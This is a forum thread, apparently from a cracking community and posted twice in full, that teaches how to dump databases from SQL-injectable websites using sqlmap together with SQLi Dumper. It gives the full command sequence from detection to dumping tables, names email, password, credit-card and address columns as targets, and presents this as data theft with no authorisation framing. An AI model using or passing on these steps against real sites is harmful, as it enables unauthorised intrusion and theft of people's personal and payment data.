andersmadsen0
Platform Algorithm Expert
2
MONTHS
2 2 MONTHS OF SERVICE
LEVEL 1
300 XP
PLEASE LIKE THE THREAD, I SPENT TIME MAKING THIS THREAD FOR YOU GUYS !
HOW TO DUMP DATABASES LIKE A PRO
Overview: I spent time making this thread as a lot of people still use SQLi Dumper to dump their shit. In this thread I will show you guys how to dump like a pro ! Requirements: A windows device (rdp works as well)
LETS BEGIN BUT FIRST LEAVE A LIKE ! I SPENT MY OWN TIME TO MAKE THIS THREAD !
Downloads:
To begin we will need to download the program and the language required to run it. First head over to https://www.python.org/downloads/ and download both versions (not needed but its better to have both). Then visit this site http://sqlmap.org/ and download it.
Setup:
After installing python extract sqlmap somewhere. I will be showing you some tips to access it from any folder. Rename the program to something easy to type as the .py file will look like sqlmap3849234832948324.
Usage:
Alright so when your in the sqlmap folder, click the directory and type cmd. this should automatically open a command prompt in your current folder. Type the following command:
python sqlmap.py -u (url here) --random-agent
press y for everything UNTIL it asks you if you wanna keep searching for vulnerabilities after finding one.
After it finishes write the next command:
python sqlmap.py -u (url) --dbs --random-agent --threads=10
it should print databases. (i will let you know how i personally do it combining both dumper and sqlmap.
python sqlmap.py -u (url) -D (databasename) --tables --random-agent --threads=10
it should list a bunch of tables. depending on what you want to dump...
python sqlmap.py -u (url) -D (db name) -T (table name) --columns -- random-agent --threads=10
it should print out all the columns (email, pass, cc, address, etc)
and finally how to dump your target:
python sqlmap.py -u (url) -D (db name) -T (table name) -C (column,name) --dump --random-agent --threads=10
what it should look like at the end:
python sqlmap.py -u https://yourmomsvagina.com -D yourmoms -T vagina -C email,pass --dump --random-agent --threads=10 --eta
AND BOOM YOU JUST DUMPED SOMETHING !
Now some of you guys might wonder how you can combine dumper and sqlmap for the best results. after scanning urls and checking to see if they are exploitable/injectable, you wanna go to an injectable url (choose any injectable url and click new dumper) and the database name and columns should show up. copy the url without the exploit in it (https://www.pornhub.com/gay' = https://www.pornhub.com/gay removing the ')
go to sqlmap and follow the steps i listed earlier.
IF YOU WERE LOSS IN MY SHITTY TUTORIAL DO PYTHON SQLMAP.PY -HH
LIKE THE THREAD LIKE THE THREAD LIKE THE THREAD
New thread with hands on experience: https://cracked.to/Thread-Supreme-HANDS-ON-TUTORIAL-HOW-TO-DUMP-USING-SQLMAP
HOW TO DUMP DATABASES LIKE A PRO Overview: I spent time making this thread as a lot of people still use SQLi Dumper to dump their shit. In this thread I will show you guys how to dump like a pro ! Requirements: A windows device (rdp works as well)
LETS BEGIN BUT FIRST LEAVE A LIKE ! I SPENT MY OWN TIME TO MAKE THIS THREAD !
Downloads:
To begin we will need to download the program and the language required to run it. First head over to https://www.python.org/downloads/ and download both versions (not needed but its better to have both). Then visit this site http://sqlmap.org/ and download it.
Setup:
After installing python extract sqlmap somewhere. I will be showing you some tips to access it from any folder. Rename the program to something easy to type as the .py file will look like sqlmap3849234832948324.
Loading…
gyazo.com
Alright so when your in the sqlmap folder, click the directory and type cmd. this should automatically open a command prompt in your current folder. Type the following command:
python sqlmap.py -u (url here) --random-agent
press y for everything UNTIL it asks you if you wanna keep searching for vulnerabilities after finding one.
After it finishes write the next command:
python sqlmap.py -u (url) --dbs --random-agent --threads=10
it should print databases. (i will let you know how i personally do it combining both dumper and sqlmap.
python sqlmap.py -u (url) -D (databasename) --tables --random-agent --threads=10
it should list a bunch of tables. depending on what you want to dump...
python sqlmap.py -u (url) -D (db name) -T (table name) --columns -- random-agent --threads=10
it should print out all the columns (email, pass, cc, address, etc)
and finally how to dump your target:
python sqlmap.py -u (url) -D (db name) -T (table name) -C (column,name) --dump --random-agent --threads=10
what it should look like at the end:
python sqlmap.py -u https://yourmomsvagina.com -D yourmoms -T vagina -C email,pass --dump --random-agent --threads=10 --eta
AND BOOM YOU JUST DUMPED SOMETHING !
Now some of you guys might wonder how you can combine dumper and sqlmap for the best results. after scanning urls and checking to see if they are exploitable/injectable, you wanna go to an injectable url (choose any injectable url and click new dumper) and the database name and columns should show up. copy the url without the exploit in it (https://www.pornhub.com/gay' = https://www.pornhub.com/gay removing the ')
go to sqlmap and follow the steps i listed earlier.
IF YOU WERE LOSS IN MY SHITTY TUTORIAL DO PYTHON SQLMAP.PY -HH
LIKE THE THREAD LIKE THE THREAD LIKE THE THREAD
New thread with hands on experience: https://cracked.to/Thread-Supreme-HANDS-ON-TUTORIAL-HOW-TO-DUMP-USING-SQLMAP